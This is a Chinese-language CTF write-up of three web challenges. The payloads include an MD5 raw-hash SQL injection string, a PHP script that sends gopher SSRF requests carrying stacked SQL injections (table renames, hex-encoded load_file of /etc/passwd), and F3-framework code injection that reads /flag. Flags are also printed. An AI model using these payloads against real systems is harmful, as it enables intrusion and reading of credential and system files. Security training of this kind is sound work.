前言

第十八,企业组第一,高校组太卷了。

4c2fc6107bcfe29f1834d48083d482cf-1

但讲道理,题目质量,真的不咋地。

还有一个 Web 题 Internal System 会在复现环境搭完后写。

WEB1 “慢慢做”管理系统

操作内容:

这世间,竟然有这种题。

YjID16pLkM405w0t.pngthumbnail

看了提示,才知道那里是 MD5 密码之后拼接到语句里的。

https://blog.werner.wiki/php-md5-true-sqli/

MD5 注入,那么就找个 MD5 之后十六进制代表 or 的字符串。

ffifdyop 被屏蔽了,129581926211651571912466741651878684928 可以。

登录之后是个 ssrf 点。

kZukVAyFTgaafnDI.pngthumbnail

试了试,用这个点访问 admin.php 不 302 了,那么写个脚本玩玩,测下 username 和 password,方便操作。 测了下有堆叠注入。

<?php
//$payload = "username=admin'/**/or/**/1=2;PREPARE jwt from 0x73656c656374202a2066726f6d207265616c5f61646d696e5f686572655f646f5f796f755f66696e643b;EXECUTE jwt;##&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=2;RENAME TABLE `fake_admin` TO `fake_admin1`;RENAME TABLE `real_admin_here_do_you_find` TO `fake_admin`;##&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;RENAME TABLE `fake_admin` TO `fake_admin1`;RENAME TABLE `user2` TO `fake_admin`;##&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;use ctf;show tables;RENAME TABLE ctf.users TO ctf2.user2;RENAME TABLE ctf2.real_admin_here_do_you_find TO ctf.users;show columns from users;##&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;show global variables;#&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;PREPARE jwt from 0x73656c656374206c6f61645f66696c6528272f6574632f70617373776427293b;EXECUTE jwt;;#&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;show tables;#&password=129581926211651571912466741651878684928";
//$payload = "username=admin_inner';show columns from fake_admin;show columns from real_admin_here_do_you_find;&password=5fb4e07de914cfc82afb44vbaf402203";
//$payload = "username=admin&password=5fb4e07de914cfc82afb44vbaf402203";
$payload = "username=admin'/**/or/**/1=1;show/**/tables;#&password=fake_password";
$test = "POST /admin.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
cache-control: no-cache
User-Agent: PostmanRuntime/7.6.0
Cookie: PHPSESSID=lh0aib3rhtu7eausnf46h7u9m7
Accept: */*
Host: 127.0.0.1
Content-Length: ".strlen($payload)."
Connection: close
".$payload."


";
//$payload = "username=admin_inner&password=5fb4e07de914cfc82afb44vbaf402203";
//$test = "GET /flag.php HTTP/1.1
//Content-Type: application/x-www-form-urlencoded
//X-Forwarded-For: 127.0.0.1
//cache-control: no-cache
//User-Agent: PostmanRuntime/7.6.0
//Cookie: PHPSESSID=lh0aib3rhtu7eausnf46h7u9m7
//Accept: */*
//Host: 127.0.0.1
//Connection: close
//
//";
echo("gopher://127.0.0.1:80/_".rawurlencode($test));
$curl = curl_init();
curl_setopt_array($curl, array(
    CURLOPT_URL => "http://eci-2ze3piaq8eraibp8xg73.cloudeci1.ichunqiu.com/ssrf.php?way=".rawurlencode("gopher://127.0.0.1:80/_".rawurlencode($test)),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_ENCODING => "",
    CURLOPT_MAXREDIRS => 10,
    CURLOPT_TIMEOUT => 30,
    CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
    CURLOPT_CUSTOMREQUEST => "GET",
    CURLOPT_POSTFIELDS => "",
    CURLOPT_HTTPHEADER => array(
        "Cookie: PHPSESSID=lh0aib3rhtu7eausnf46h7u9m7",
        "cache-control: no-cache"
    ),
));
$response = curl_exec($curl);
$err = curl_error($curl);
curl_close($curl);
if ($err) {
    echo "cURL Error #:" . $err;
} else {
    echo $response;
}

fBpXW0CLXiZPRCv5.pngthumbnail

那么老规矩,按照https://www.zhaoj.in/read-5873.html#0x04 这里的方法,改表名,读内容。(晚上写 wp 复现时卡住了,下午的时候却可以- -||离谱,还好那时候存了下密码)

$payload = "username=admin'/**/or/**/1=2;RENAME TABLE `fake_admin` TO `fake_admin1`;RENAME TABLE `real_admin_here_do_you_find` TO `fake_admin`;##&password=129581926211651571912466741651878684928";

结果

array(1) {<br />
  [0]=><br />
  array(3) {<br />
    ["id"]=><br />
    string(1) "1"<br />
    ["username"]=><br />
    string(11) "admin_inner"<br />
    ["password"]=><br />
    string(32) "5fb4e07de914cfc82afb44vbaf402203"<br />
  }<br />
}<br />

然后,这里是这个题最脑洞的地方了,需要用这个密码搭配用户名 admin 进行登录。

$payload = "username=admin&password=5fb4e07de914cfc82afb44vbaf402203";


gopher://127.0.0.1:80/_POST%20%2Fadmin.php%20HTTP%2F1.1%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0AX-Forwarded-For%3A%20127.0.0.1%0Acache-control%3A%20no-cache%0APostman-Token%3A%20375ba985-8106-4d79-bafd-dff6654589b8%0AUser-Agent%3A%20PostmanRuntime%2F7.6.0%0ACookie%3A%20PHPSESSID%3Du470ueuprk7mtfhpiasfu50561%0AAccept%3A%20%2A%2F%2A%0AHost%3A%20127.0.0.1%0AContent-Length%3A%2056%0AConnection%3A%20close%0A%0Ausername%3Dadmin%26password%3D5fb4e07de914cfc82afb44vbaf402203%0A%0A%0A%0A%0A

k22Fjmgkz3MQRWqf.pngthumbnail

然后再访问 /flag.php,即可。

ABaSVM42uo9BqhRn.pngthumbnail

flag值:

flag{0e691080-310e-414a-aa02-6de9d6d2826a}

WEB2 签到

操作内容:

看到提示,才知道要用前几天用的的那个 php 后门。

6ezlD4Pz9GvBweBU.pngthumbnail

flag值:

flag{394ee197-512a-4e45-b2bf-3072da63eff1}

WEB3 unsetme

操作内容:

打开。

TGxlUsNFNLuFw6Zr.pngthumbnail

结合代码和上网一搜,是 F3 框架。

把代码拷到本地,开报错,追代码,可以追到 lib/base.php 的 530 行。

GgUtrhSjWTvuExdv.pngthumbnail

输出看看,可以看到 unset 的代码有将 a 拼接进来。

7EDkwQumrIZBWoC6.pngthumbnail

那么就想办法闭合代码,使其合法即可。

/?a=a%0a);%0aphpinfo(

Zy165924cuBFUnPB.pngthumbnail

然后就可以读 flag 了。

/?a=a%0a);%0aecho file_get_contents(%27/flag%27

tFEjXr8hHLqah5fZ.pngthumbnail

 

Zb6Z6R6i6f18qGwP.pngthumbnail

flag值:

flag{1a2e31bd-45de-46d8-82d2-d89e50135cda}